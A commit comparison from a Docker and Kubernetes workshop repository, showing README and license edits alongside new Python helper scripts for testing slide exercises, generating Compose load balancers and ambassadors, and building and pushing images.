Compare commits

3 commits (2017-05-08)

| Author | SHA1 | Date |
|---|---|---|
| | d8d4148870 | |
| | 997f4dbaa0 | |
| | a65cc3047a | |
.gitignore (24 changes, vendored)

@@ -1,24 +1,8 @@
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
node_modules

### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride

### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

gitpod (1 change)

@@ -1 +0,0 @@
image: jpetazzo/shpod

CHECKLIST.md (24 changes)

@@ -1,24 +0,0 @@
Checklist to use when delivering a workshop
Authored by Jérôme; additions by Bridget

- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
- [ ] Push local branch to GitHub and merge into main repo
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] Update the slides that say which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
- [ ] Update the versions of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
- [ ] (optional) Create chatroom
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] How many VMs do we need? Check with event organizers ahead of time
- [ ] Provision VMs (slightly more than we think we'll need)
- [ ] Change password on presenter's VMs (to forestall any hijinx)
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
- [ ] Print cards
- [ ] Cut cards
- [ ] Last-minute merge from master
- [ ] Check that all looks good
- [ ] DELIVER!
- [ ] Shut down VMs
- [ ] Update index.html to remove chat link and move session to past things

LICENSE (19 changes)

@@ -1,12 +1,13 @@
The code in this repository is licensed under the Apache License
Version 2.0. You may obtain a copy of this license at:
Copyright 2015 Jérôme Petazzoni

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

The instructions and slides in this repository (e.g. the files
with extension .md and .yml in the "slides" subdirectory) are
under the Creative Commons Attribution 4.0 International Public
License. You may obtain a copy of this license at:

https://creativecommons.org/licenses/by/4.0/legalcode

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

README.md (297 changes)

@@ -1,134 +1,137 @@
# Container Training
# Docker Orchestration Workshop

This repository (formerly known as `orchestration-workshop`)
contains materials (slides, scripts, demo app, and other
code samples) used for various workshops, tutorials, and
training sessions around the themes of Docker, containers,
and orchestration.

For the moment, it includes:

- Introduction to Docker and Containers,
- Container Orchestration with Docker Swarm,
- Container Orchestration with Kubernetes.

These materials have been designed around the following
principles:

- they assume very little prior knowledge of Docker,
  containers, or a particular programming language;
- they can be used in a classroom setup (with an
  instructor), or self-paced at home;
- they are hands-on, meaning that they contain lots
  of examples and exercises that you can easily
  reproduce;
- they progressively introduce concepts in chapters
  that build on top of each other.

If you're looking for the materials, you can stop reading
right now, and hop to http://container.training/, which
hosts all the slide decks available.

The rest of this document explains how this repository
is structured, and how to use it to deliver (or create)
your own tutorials.
This is the material (slides, scripts, demo app, and other
code samples) for the "Docker orchestration workshop"
written and delivered by Jérôme Petazzoni (and lots of others)
non-stop since June 2015.


## Why a single repository?
## Content

All these materials have been gathered in a single repository
because they have a few things in common:

- some [shared slides](slides/shared/) that are re-used
  (and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
  Markdown source files;
- a [semi-automated test harness](slides/autopilot/) to check
  that the exercises and examples provided work properly;
- a [PhantomJS script](slides/slidechecker.js) to check
  that the slides look good and don't have formatting issues;
- [deployment scripts](prepare-vms/) to start training
  VMs in bulk;
- a fancy pipeline powered by
  [Netlify](https://www.netlify.com/) and continuously
  deploying `master` to http://container.training/.
- Chapter 1: Getting Started: running apps with docker-compose
- Chapter 2: Scaling out with Swarm Mode
- Chapter 3: Operating the Swarm (networks, updates, logging, metrics)
- Chapter 4: Deeper in Swarm (stateful services, scripting, DABs)


## What are the different courses available?
## Quick start (or, "I want to try it!")

**Introduction to Docker** is derived from the first
"Docker Fundamentals" training materials. For more information,
see [jpetazzo/intro-to-docker](https://github.com/jpetazzo/intro-to-docker).
The version in this repository has been adapted to the Markdown
publishing pipeline. It is still maintained, but only receives
minor updates once in a while.
This workshop is designed to be *hands on*, i.e. to give you a step-by-step
guide where you will build your own Docker cluster, and use it to deploy
a sample application.

**Container Orchestration with Docker Swarm** (formerly
known as "Orchestration Workshop") is a workshop created by Jérôme
Petazzoni in June 2015. Since then, it has been continuously updated
and improved, and has received contributions from many other authors.
It is actively maintained.
The easiest way to follow the workshop is to attend it when it is delivered
by an instructor. In that case, the instructor will generally give you
credentials (IP addresses, login, password) to connect to your own cluster
of virtual machines; and the [slides](http://jpetazzo.github.io/orchestration-workshop)
assume that you have your own cluster indeed.

**Container Orchestration with Kubernetes** was created by
Jérôme Petazzoni in October 2017, with help and feedback from
a few other contributors. It is actively maintained.
If you want to follow the workshop on your own, and want to have your
own cluster, we have multiple solutions for you!


## Repository structure
### Using [play-with-docker](http://play-with-docker.com/)

- [bin](bin/)
  - A few helper scripts that you can safely ignore for now.
- [dockercoins](dockercoins/)
  - The demo app used throughout the orchestration workshops.
- [efk](efk/), [elk](elk/), [prom](prom/), [snap](snap/):
  - Logging and metrics stacks used in the later parts of
    the orchestration workshops.
- [prepare-local](prepare-local/), [prepare-machine](prepare-machine/):
  - Contributed scripts to automate the creation of local environments.
    These could use some help to test/check that they work.
- [prepare-vms](prepare-vms/):
  - Scripts to automate the creation of AWS instances for students.
    These are routinely used and actively maintained.
- [slides](slides/):
  - All the slides! They are assembled from Markdown files with
    a custom Python script, and then rendered using [gnab/remark](
    https://github.com/gnab/remark). Check this directory for more details.
- [stacks](stacks/):
  - A handful of Compose files (version 3) that make it easy to
    deploy complex application stacks.
This method is very easy to get started with (you don't need any extra account
or resources!) but will require a bit of adaptation from the workshop slides.

To get started, go to [play-with-docker](http://play-with-docker.com/), and
click on _ADD NEW INSTANCE_ five times. You will get five "docker-in-docker"
containers, all on a private network. These are your five nodes for the workshop!

When the instructions in the slides tell you to "SSH on node X", just go to
the tab corresponding to that node.

The nodes are not directly reachable from outside; so when the slides tell
you to "connect to the IP address of your node on port XYZ" you will have
to use a different method.

We suggest using "supergrok", a container offering an NGINX+ngrok combo to
expose your services. To use it, just start (on any of your nodes) the
`jpetazzo/supergrok` image. The image will output further instructions:

```
docker run --name supergrok -d jpetazzo/supergrok
docker logs --follow supergrok
```

The logs of the container will give you a tunnel address and explain
how to connect to exposed services. That's all you need to do!

We are also working on a native proxy, embedded in Play-With-Docker.
Stay tuned!

<!--

- You can use a proxy provided by Play-With-Docker. When the slides
  instruct you to connect to nodeX on port ABC, instead, you will connect
  to http://play-with-docker.com/XXX.XXX.XXX.XXX:ABC, where XXX.XXX.XXX.XXX
  is the IP address of nodeX.

-->

Note that the instances provided by Play-With-Docker have a short lifespan
(a few hours only), so if you want to do the workshop over multiple sessions,
you will have to start over each time... or create your own cluster with
one of the methods described below.


## Course structure
### Using Docker Machine to create your own cluster

(This applies only to the orchestration workshops.)
This method requires a bit more work to get started, but you get a permanent
cluster, with fewer limitations.

The workshop introduces a demo app, "DockerCoins," built
around a micro-services architecture. First, we run it
on a single node, using Docker Compose. Then, we pretend
that we need to scale it, and we use an orchestrator
(SwarmKit or Kubernetes) to deploy and scale the app on
a cluster.
You will need Docker Machine (if you have Docker Mac, Docker Windows, or
the Docker Toolbox, you're all set already). You will also need:

We explain the concepts of the orchestrator. For SwarmKit,
we set up the cluster with `docker swarm init` and `docker swarm join`.
For Kubernetes, we use pre-configured clusters.
- credentials for a cloud provider (e.g. API keys or tokens),
- or a local install of VirtualBox or VMware (or anything supported
  by Docker Machine).

Then, we cover more advanced concepts: scaling, load balancing,
updates, global services or daemon sets.

There are a number of advanced optional chapters about
logging, metrics, secrets, network encryption, etc.

The content is very modular: it is broken down into a large
number of Markdown files, which are put together according
to a YAML manifest. This makes it very easy to re-use content
between different workshops.
Full instructions are in the [prepare-machine](prepare-machine) subdirectory.
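For a rough idea of what the Docker Machine route looks like, here is a minimal sketch (the VirtualBox driver and the `node1`..`node5` names are assumptions; the actual procedure is in [prepare-machine](prepare-machine)):

```
# Create five local VMs for the workshop:
for N in 1 2 3 4 5; do
  docker-machine create --driver virtualbox node$N
done
# Point the Docker client at the first node:
eval $(docker-machine env node1)
```
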
### DockerCoins
### Using our scripts to mass-create a bunch of clusters

The sample app is in the `dockercoins` directory.
It's used during all chapters.
Since we often deliver the workshop during conferences or similar events,
we have scripts to automate the creation of a bunch of clusters using
AWS EC2. If you want to create multiple clusters and have EC2 credits,
check the [prepare-vms](prepare-vms) directory for more information.


## How This Repo is Organized

- **dockercoins**
  - Sample App: compose files and source code for the dockercoins sample apps
    used throughout the workshop
- **docs**
  - Slide Deck: presentation slide deck, works out of the box with GitHub Pages,
    uses https://remarkjs.com
- **prepare-local**
  - untested scripts for automating the creation of local VirtualBox VMs
    (could use your help validating)
- **prepare-machine**
  - instructions explaining how to use Docker Machine to create VMs
- **prepare-vms**
  - scripts for automating the creation of AWS instances for students


## Slide Deck

- The slides are in the `docs` directory.
- To view them locally, open `docs/index.html` in your browser. It works
  offline too.
- To view them online, open https://jpetazzo.github.io/orchestration-workshop/
  in your browser.
- When you fork this repo, be sure GitHub Pages is enabled in repo Settings
  for "master branch /docs folder" and you'll have your own website for them.
- They use https://remarkjs.com to allow simple markdown in an HTML file that
  remark will transform into a presentation in the browser.


## Sample App: Dockercoins!

The sample app is in the `dockercoins` directory. It's used during all chapters
for explaining different concepts of orchestration.

To see it in action:
@@ -138,18 +141,13 @@ To see it in action:
- the web UI will be available on port 8000


*If you just want to run the workshop for yourself, you can stop reading
here. If you want to deliver the workshop for others (i.e. if you
want to become an instructor), keep reading!*


## Running the Workshop

If you want to deliver one of these workshops yourself,
this section is for you!

> *This section has been mostly contributed by
> [Bret Fisher](https://twitter.com/bretfisher), who was
> one of the first persons to have the bravery of delivering
> this workshop without me. Thanks Bret! 🍻
>
> Jérôme.*


### General timeline of planning a workshop

@@ -157,7 +155,7 @@ this section is for you!
  understand the different `dockercoins` repos and the steps we go through to
  get to a full Swarm Mode cluster of many containers. You'll update the first
  few slides and last slide at a minimum, with your info.
- ~~Your docs directory can use GitHub Pages.~~
- Your docs directory can use GitHub Pages.
- This workshop expects 5 servers per student. You can get away with as few
  as 2 servers per student, but you'll need to change the slide deck to
  accommodate. More servers = more fun.
@@ -183,14 +181,13 @@ this section is for you!
  they need for class.
- Typically you create the servers the day before or morning of workshop, and
  leave them up the rest of day after workshop. If creating hundreds of servers,
  you'll likely want to run all these `workshopctl` commands from a dedicated
  you'll likely want to run all these `trainer` commands from a dedicated
  instance you have in same region as instances you want to create. Much faster
  this way if you're on poor internet. Also, create 2 sets of servers for
  yourself, and use one during workshop and the 2nd is a backup.
- Remember you'll need to print the "cards" for students, so you'll need to
  create instances while you have a way to print them.


### Things That Could Go Wrong

- Creating AWS instances ahead of time, and you hit its limits in region and
@@ -199,20 +196,18 @@ this section is for you!
  locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
  can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
  prevent you from losing your place if you get disconnected from servers.
  prevent you from loosing your place if you get disconnected from servers.
  https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IPs.
- Forget to have fun and focus on your students!

### Creating the VMs

`prepare-vms/workshopctl` is the script that gets you most of what you need for
`prepare-vms/trainer` is the script that gets you most of what you need for
setting up instances. See
[prepare-vms/README.md](prepare-vms)
for all the info on tools and scripts.


### Content for Different Workshop Durations

With all the slides, this workshop is a full day long. If you need to deliver
@@ -221,7 +216,6 @@ can replace `---` with `???` which will hide slides. Or leave them there and
add something like `(EXTRA CREDIT)` to title so students can still view the
content but you also know to skip during presentation.
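To make the `---`/`???` trick concrete, here is a sketch (remark treats `???` as the separator for speaker notes, so turning a slide separator into `???` folds the next slide into the notes of the previous one):

```
# This slide stays in the deck

???
# This one is hidden
It became speaker notes for the slide above.
```
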
#### 3 Hour Version

- Limit time on debug tools, maybe skip a few. *"Chapter 1:
@@ -233,7 +227,6 @@ content but you also know to skip during presentation.
- Mention what DABs are, but make this part optional in case you run out
  of time


#### 2 Hour Version

- Skip all the above, and:
@@ -247,17 +240,6 @@ content but you also know to skip during presentation.
- Last 15-30 minutes is for stateful services, DAB files, and questions.
### Pre-built images

There are pre-built images for the 4 components of the DockerCoins demo app: `dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`, and `dockercoins/worker:v0.1`. They correspond to the code in this repository.

There are also three variants, for demo purposes:

- `dockercoins/rng:v0.2` is broken (the server won't even start),
- `dockercoins/webui:v0.2` has a bigger font on the Y axis and a green graph (instead of blue),
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
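These variants make it easy to demo rolling updates. For instance, a hypothetical session (assuming the app runs as a Swarm stack named `dockercoins`, so its services are named `dockercoins_worker`, etc.):

```
# Roll out the slow worker and watch the mining rate drop...
docker service update dockercoins_worker --image dockercoins/worker:v0.2
# ...then roll back to the previous version:
docker service update --rollback dockercoins_worker
```
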
## Past events

Since its inception, this workshop has been delivered dozens of times,
@@ -289,34 +271,13 @@ If there is a bug and you can't fix it, but you can
reproduce it: submit an issue explaining how to reproduce.

If there is a bug and you can't even reproduce it:
sorry. It is probably a Heisenbug. We can't act on it
until it's reproducible, alas.
sorry. It is probably a Heisenbug. I can't act on it
until it's reproducible.

If you have attended this workshop and have feedback,
or if you want us to deliver that workshop at your
conference or for your company: contact me (jerome
at docker dot com).

# “Please teach us!”

If you have attended one of these workshops, and want
your team or organization to attend a similar one, you
can look at the list of upcoming events on
http://container.training/.

You are also welcome to reuse these materials to run
your own workshop, for your team or even at a meetup
or conference. In that case, you might enjoy watching
[Bridget Kromhout's talk at KubeCon 2018 Europe](
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
precisely how to run such a workshop yourself.

Finally, you can also contact the following persons,
who are experienced speakers, are familiar with the
material, and are available to deliver these workshops
at your conference or for your company:

- jerome dot petazzoni at gmail dot com
- bret at bretfisher dot com

(If you are willing and able to deliver such workshops,
feel free to submit a PR to add your name to that list!)

**Thank you!**
Thank you!

autotest/autotest.py (191 changes, new executable file)

@@ -0,0 +1,191 @@
#!/usr/bin/env python

import os
import re
import signal
import subprocess
import time

def print_snippet(snippet):
    print(78*'-')
    print(snippet)
    print(78*'-')

class Snippet(object):

    def __init__(self, slide, content):
        self.slide = slide
        self.content = content
        self.actions = []

    def __str__(self):
        return self.content


class Slide(object):

    current_slide = 0

    def __init__(self, content):
        Slide.current_slide += 1
        self.number = Slide.current_slide
        # Remove commented-out slides
        # (remark.js considers ??? to be the separator for speaker notes)
        content = re.split(r"\n\?\?\?\n", content)[0]
        self.content = content
        self.snippets = []
        exercises = re.findall(r"\.exercise\[(.*)\]", content, re.DOTALL)
        for exercise in exercises:
            if "```" in exercise and "<br/>`" in exercise:
                print("! Exercise on slide {} has both ``` and <br/>` delimiters, skipping."
                      .format(self.number))
                print_snippet(exercise)
            elif "```" in exercise:
                for snippet in exercise.split("```")[1::2]:
                    self.snippets.append(Snippet(self, snippet))
            elif "<br/>`" in exercise:
                for snippet in re.findall("<br/>`(.*)`", exercise):
                    self.snippets.append(Snippet(self, snippet))
            else:
                print("! Exercise on slide {} has neither ``` nor <br/>` delimiters, skipping."
                      .format(self.number))

    def __str__(self):
        text = self.content
        for snippet in self.snippets:
            text = text.replace(snippet.content, ansi("7")(snippet.content))
        return text


def ansi(code):
    return lambda s: "\x1b[{}m{}\x1b[0m".format(code, s)

slides = []
with open("index.html") as f:
    content = f.read()
    for slide in re.split("\n---?\n", content):
        slides.append(Slide(slide))

is_editing_file = False
placeholders = {}
for slide in slides:
    for snippet in slide.snippets:
        content = snippet.content
        # Multi-line snippets should be ```highlightsyntax...
        # Single-line snippets will be interpreted as shell commands
        if '\n' in content:
            highlight, content = content.split('\n', 1)
        else:
            highlight = "bash"
        content = content.strip()
        # If the previous snippet was a file fragment, and the current
        # snippet is not YAML or EDIT, complain.
        if is_editing_file and highlight not in ["yaml", "edit"]:
            print("! On slide {}, previous snippet was YAML, so what do what do?"
                  .format(slide.number))
            print_snippet(content)
        is_editing_file = False
        if highlight == "yaml":
            is_editing_file = True
        elif highlight == "placeholder":
            for line in content.split('\n'):
                variable, value = line.split(' ', 1)
                placeholders[variable] = value
        elif highlight == "bash":
            # Iterate over a copy, since entries are deleted as they are substituted.
            for variable, value in list(placeholders.items()):
                quoted = "`{}`".format(variable)
                if quoted in content:
                    content = content.replace(quoted, value)
                    del placeholders[variable]
            if '`' in content:
                print("! The following snippet on slide {} contains a backtick:"
                      .format(slide.number))
                print_snippet(content)
                continue
            print("_ "+content)
            snippet.actions.append((highlight, content))
        elif highlight == "edit":
            print(". "+content)
            snippet.actions.append((highlight, content))
        elif highlight == "meta":
            print("^ "+content)
            snippet.actions.append((highlight, content))
        else:
            print("! Unknown highlight {!r} on slide {}.".format(highlight, slide.number))
if placeholders:
    print("! Remaining placeholder values: {}".format(placeholders))

actions = sum([snippet.actions for snippet in sum([slide.snippets for slide in slides], [])], [])

# Strip ^{ ... ^} for now
def strip_curly_braces(actions, in_braces=False):
    if actions == []:
        return []
    elif actions[0] == ("meta", "^{"):
        return strip_curly_braces(actions[1:], True)
    elif actions[0] == ("meta", "^}"):
        return strip_curly_braces(actions[1:], False)
    elif in_braces:
        return strip_curly_braces(actions[1:], True)
    else:
        return [actions[0]] + strip_curly_braces(actions[1:], False)

actions = strip_curly_braces(actions)

background = []
cwd = os.path.expanduser("~")
env = {}
for current_action, next_action in zip(actions, actions[1:]+[("bash", "true")]):
    if current_action[0] == "meta":
        continue
    print(ansi(7)(">>> {}".format(current_action[1])))
    time.sleep(1)
    popen_options = dict(shell=True, cwd=cwd, stdin=subprocess.PIPE, preexec_fn=os.setpgrp)
    # The following hack captures the environment variables set by `docker-machine env`.
    # FIXME: this doesn't handle `unset` for now
    if any([
        "eval $(docker-machine env" in current_action[1],
        "DOCKER_HOST" in current_action[1],
        "COMPOSE_FILE" in current_action[1],
    ]):
        popen_options["stdout"] = subprocess.PIPE
        # Actions are tuples (immutable), so build an updated one instead of assigning in place.
        current_action = (current_action[0], current_action[1] + "\nenv")
    proc = subprocess.Popen(current_action[1], **popen_options)
    proc.cmd = current_action[1]
    if next_action[0] == "meta":
        print(">>> {}".format(next_action[1]))
        time.sleep(3)
        if next_action[1] == "^C":
            os.killpg(proc.pid, signal.SIGINT)
            proc.wait()
        elif next_action[1] == "^Z":
            # Let the process run
            background.append(proc)
        elif next_action[1] == "^D":
            proc.communicate()
            proc.wait()
        else:
            print("! Unknown meta action {} after snippet:".format(next_action[1]))
            print_snippet(next_action[1])
        print(ansi(7)("<<< {}".format(current_action[1])))
    else:
        proc.wait()
        if "stdout" in popen_options:
            stdout, stderr = proc.communicate()
            for line in stdout.split('\n'):
                if line.startswith("DOCKER_"):
                    variable, value = line.split('=', 1)
                    env[variable] = value
                    print("=== {}={}".format(variable, value))
        print(ansi(7)("<<< {} >>> {}".format(proc.returncode, current_action[1])))
        if proc.returncode != 0:
            print("Got non-zero status code; aborting.")
            break
    if current_action[1].startswith("cd "):
        cwd = os.path.expanduser(current_action[1][3:])

for proc in background:
    print("Terminating background process:")
    print_snippet(proc.cmd)
    proc.terminate()
    proc.wait()

autotest/index.html (1 change, new symbolic link)

@@ -0,0 +1 @@
../www/htdocs/index.html

bin/add-load-balancer-v1.py (42 changes, new executable file)

@@ -0,0 +1,42 @@
#!/usr/bin/env python

import os
import sys
import yaml

# arg 1 = service name
# arg 2 = number of instances

service_name = sys.argv[1]
desired_instances = int(sys.argv[2])

compose_file = os.environ["COMPOSE_FILE"]
input_file, output_file = compose_file, compose_file

config = yaml.load(open(input_file))

# The ambassadors need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))

port = str(ports[service_name])

command_line = port

depends_on = []

for n in range(1, 1+desired_instances):
    config["services"]["{}{}".format(service_name, n)] = config["services"][service_name]
    command_line += " {}{}:{}".format(service_name, n, port)
    depends_on.append("{}{}".format(service_name, n))

config["services"][service_name] = {
    "image": "jpetazzo/hamba",
    "command": command_line,
    "depends_on": depends_on,
}
if "networks" in config["services"]["{}1".format(service_name)]:
    config["services"][service_name]["networks"] = config["services"]["{}1".format(service_name)]["networks"]

yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)

bin/add-load-balancer-v2.py (87 changes, new executable file)

@@ -0,0 +1,87 @@
#!/usr/bin/env python

import os
import sys
import yaml

def error(msg):
    print("ERROR: {}".format(msg))
    exit(1)

# arg 1 = service name

service_name = sys.argv[1]

compose_file = os.environ["COMPOSE_FILE"]
input_file, output_file = compose_file, compose_file

config = yaml.load(open(input_file))

version = config.get("version")
if version != "2":
    error("Unsupported $COMPOSE_FILE version: {!r}".format(version))

# The load balancers need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))

port = str(ports[service_name])

if service_name not in config["services"]:
    error("service {} not found in $COMPOSE_FILE"
          .format(service_name))

lb_name = "{}-lb".format(service_name)
be_name = "{}-be".format(service_name)
wd_name = "{}-wd".format(service_name)

if lb_name in config["services"]:
    error("load balancer {} already exists in $COMPOSE_FILE"
          .format(lb_name))

if wd_name in config["services"]:
    error("dns watcher {} already exists in $COMPOSE_FILE"
          .format(wd_name))

service = config["services"][service_name]
if "networks" in service:
    error("service {} has custom networks"
          .format(service_name))

# Put the service on its own network.
service["networks"] = {service_name: {"aliases": [ be_name ] } }
# Put a label indicating which load balancer is responsible for this service.
if "labels" not in service:
    service["labels"] = {}
service["labels"]["loadbalancer"] = lb_name

# Add the load balancer.
config["services"][lb_name] = {
    "image": "jpetazzo/hamba",
    "command": "{} {} {}".format(port, be_name, port),
    "depends_on": [ service_name ],
    "networks": {
        "default": {
            "aliases": [ service_name ],
        },
        service_name: None,
    },
}

# Add the DNS watcher.
config["services"][wd_name] = {
    "image": "jpetazzo/watchdns",
    "command": "{} {} {}".format(port, be_name, port),
    "volumes_from": [ lb_name ],
    "networks": {
        service_name: None,
    },
}

if "networks" not in config:
    config["networks"] = {}
if service_name not in config["networks"]:
    config["networks"][service_name] = None

yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)

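A hypothetical invocation, mirroring how `bin/setup-all-the-things.sh` (further below) calls this script; `COMPOSE_FILE` must point at a version 2 Compose file, and `ports.yml` must map `rng` to its port:

```
cd dockercoins
export COMPOSE_FILE=docker-compose.yml
../bin/add-load-balancer-v2.py rng    # rewrites $COMPOSE_FILE in place
docker-compose up -d                  # now starts rng, rng-lb, and rng-wd
```
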
bin/build-tag-push.py (63 changes, new executable file)

@@ -0,0 +1,63 @@
#!/usr/bin/env python

from common import ComposeFile
import os
import subprocess
import time

registry = os.environ.get("DOCKER_REGISTRY")

if not registry:
    print("Please set the DOCKER_REGISTRY variable, e.g.:")
    print("export DOCKER_REGISTRY=jpetazzo # use the Docker Hub")
    print("export DOCKER_REGISTRY=localhost:5000 # use a local registry")
    exit(1)

# Get the name of the current directory.
project_name = os.path.basename(os.path.realpath("."))

# Version used to tag the generated Docker image, using the UNIX timestamp or the given version.
if "VERSION" not in os.environ:
    version = str(int(time.time()))
else:
    version = os.environ["VERSION"]

# Execute "docker-compose build" and abort if it fails.
subprocess.check_call(["docker-compose", "-f", "docker-compose.yml", "build"])

# Load the services from the input docker-compose.yml file.
# TODO: run parallel builds.
compose_file = ComposeFile("docker-compose.yml")

# Iterate over all services that have a "build" definition.
# Tag them, and initiate a push in the background.
push_operations = dict()
for service_name, service in compose_file.services.items():
    if "build" in service:
        compose_image = "{}_{}".format(project_name, service_name)
        registry_image = "{}/{}:{}".format(registry, compose_image, version)
        # Re-tag the image so that it can be uploaded to the registry.
        subprocess.check_call(["docker", "tag", compose_image, registry_image])
        # Spawn "docker push" to upload the image.
        push_operations[service_name] = subprocess.Popen(["docker", "push", registry_image])
        # Replace the "build" definition by an "image" definition,
        # using the name of the image on the registry.
        del service["build"]
        service["image"] = registry_image

# Wait for push operations to complete.
for service_name, popen_object in push_operations.items():
    print("Waiting for {} push to complete...".format(service_name))
    popen_object.wait()
    print("Done.")

# Write the new docker-compose.yml file.
if "COMPOSE_FILE" not in os.environ:
    os.environ["COMPOSE_FILE"] = "docker-compose.yml-{}".format(version)
    print("Writing to new Compose file:")
else:
    print("Writing to provided Compose file:")

print("COMPOSE_FILE={}".format(os.environ["COMPOSE_FILE"]))
compose_file.save()

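A typical session, lifted from the `setup_5_btp_dockercoins` helper in `bin/setup-all-the-things.sh` below (the local registry address is that script's choice):

```
cd dockercoins
export DOCKER_REGISTRY=localhost:5000
../bin/build-tag-push.py | tee /tmp/btp.log
# The last line of output is COMPOSE_FILE=...; pick it up, then deploy:
export $(tail -n 1 /tmp/btp.log)
docker-compose up -d
```
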
bin/common.py (76 changes, new executable file)

@@ -0,0 +1,76 @@
import os
import subprocess
import sys
import time
import yaml


def COMPOSE_FILE():
    if "COMPOSE_FILE" not in os.environ:
        print("The $COMPOSE_FILE environment variable is not set. Aborting.")
        exit(1)
    return os.environ["COMPOSE_FILE"]


class ComposeFile(object):

    def __init__(self, filename=None):
        if filename is None:
            filename = COMPOSE_FILE()
        if not os.path.isfile(filename):
            print("File {!r} does not exist. Aborting.".format(filename))
            exit(1)
        self.data = yaml.load(open(filename))

    @property
    def services(self):
        if self.data.get("version") == "2":
            return self.data["services"]
        else:
            return self.data

    def save(self, filename=None):
        if filename is None:
            filename = COMPOSE_FILE()
        with open(filename, "w") as f:
            yaml.safe_dump(self.data, f, default_flow_style=False)

# Executes a bunch of commands in parallel, but no more than N at a time.
# This makes it possible to execute a large number of tasks concurrently,
# without turning into a fork bomb.
# `parallelism` is the number of tasks to execute simultaneously.
# `commands` is a list of tasks to execute.
# Each task is itself a list, where the first element is a descriptive
# string, and the following elements are the arguments to pass to Popen.
def parallel_run(commands, parallelism):
    running = []
    # While stuff is running, or we have stuff to run...
    while commands or running:
        # While there is stuff to run, and room in the pipe...
        while commands and len(running)<parallelism:
            command = commands.pop(0)
            print("START {}".format(command[0]))
            popen = subprocess.Popen(
                command[1:], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
            popen._desc = command[0]
            running.append(popen)
        must_sleep = True
        # Iterate over a copy of the list, since finished tasks are removed from it.
        for popen in running[:]:
            status = popen.poll()
            if status is not None:
                must_sleep = False
                running.remove(popen)
                if status==0:
                    print("OK {}".format(popen._desc))
                else:
                    print("ERROR {} [Exit status: {}]"
                          .format(popen._desc, status))
                    output = "\n" + popen.communicate()[0].strip()
                    output = output.replace("\n", "\n| ")
                    print(output)
            else:
                print("WAIT ({} running, {} more to run)"
                      .format(len(running), len(commands)))
        if must_sleep:
            time.sleep(1)

bin/configure-ambassadors.py (69 changes, new executable file)

@@ -0,0 +1,69 @@
#!/usr/bin/env python

from common import parallel_run
import os
import subprocess

project_name = os.path.basename(os.path.realpath("."))

# Get all services and backends in our compose application.
containers_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=com.docker.compose.project={}".format(project_name),
    "--format", '{{ .ID }} '
                '{{ .Label "com.docker.compose.service" }} '
                '{{ .Ports }}',
])

# Build list of backends.
frontend_ports = dict()
backends = dict()
for container in containers_data.split('\n'):
    if not container:
        continue
    # TODO: support services with multiple ports!
    container_id, service_name, port = container.split(' ')
    if not port:
        continue
    backend, frontend = port.split("->")
    backend_addr, backend_port = backend.split(':')
    frontend_port, frontend_proto = frontend.split('/')
    # TODO: deal with udp (mostly skip it?)
    assert frontend_proto == "tcp"
    # TODO: check inconsistencies between port mappings
    frontend_ports[service_name] = frontend_port
    if service_name not in backends:
        backends[service_name] = []
    backends[service_name].append((backend_addr, backend_port))

# Get all existing ambassadors for this application.
ambassadors_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=ambassador.project={}".format(project_name),
    "--format", '{{ .ID }} '
                '{{ .Label "ambassador.service" }} '
                '{{ .Label "ambassador.bindaddr" }}',
])

# Update ambassadors.
operations = []
for ambassador in ambassadors_data.split('\n'):
    if not ambassador:
        continue
    ambassador_id, service_name, bind_address = ambassador.split()
    print("Updating configuration for {}/{} -> {}:{} -> {}"
          .format(service_name, ambassador_id,
                  bind_address, frontend_ports[service_name],
                  backends[service_name]))
    command = [
        ambassador_id,
        "docker", "run", "--rm", "--volumes-from", ambassador_id,
        "jpetazzo/hamba", "reconfigure",
        "{}:{}".format(bind_address, frontend_ports[service_name])
    ]
    for backend_addr, backend_port in backends[service_name]:
        command.extend([backend_addr, backend_port])
    operations.append(command)

# Execute all commands in parallel.
parallel_run(operations, 10)

bin/create-ambassadors.py (71 changes, new executable file)

@@ -0,0 +1,71 @@
#!/usr/bin/env python

from common import ComposeFile, parallel_run
import os
import subprocess

config = ComposeFile()

project_name = os.path.basename(os.path.realpath("."))

